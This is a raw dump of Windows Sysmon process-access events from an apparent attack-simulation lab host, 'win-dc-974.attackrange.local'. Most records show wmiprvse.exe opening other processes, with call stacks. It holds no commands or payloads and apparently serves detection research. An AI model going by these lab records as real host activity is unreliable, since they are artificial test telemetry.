16:54:03.575{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240595Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.575{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240594Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.575{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240593Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.575{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240592Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.575{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240591Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.575{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240590Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.574{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240589Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.574{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240588Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.573{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240587Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.572{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240586Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.572{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240585Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.571{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240584Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.570{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240583Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.570{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5A8B-603E-E3A7-00000000AD01}11288C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240582Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.569{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59D7-603E-CAA7-00000000AD01}15144C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240581Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.567{05ADC7E1-229D-6039-0B00-00000000AD01}852892C:\Windows\system32\lsass.exe{05ADC7E1-6DAB-603E-BBAA-00000000AD01}14536C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240580Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.567{05ADC7E1-229D-6039-0B00-00000000AD01}852892C:\Windows\system32\lsass.exe{05ADC7E1-6DAB-603E-BBAA-00000000AD01}14536C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240579Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.567{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59D7-603E-C9A7-00000000AD01}15528C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240578Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.563{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59C3-603E-C8A7-00000000AD01}15472C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002240577Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.563{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BDDD1C7904B6CCC6FB78E4802DBA5F02,SHA256=F461727209F9536C9DD48EB126FCF506C126D01BF9513C3345E5CCBABD82D035,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002240576Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.562{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59BE-603E-C3A7-00000000AD01}15012C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240575Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 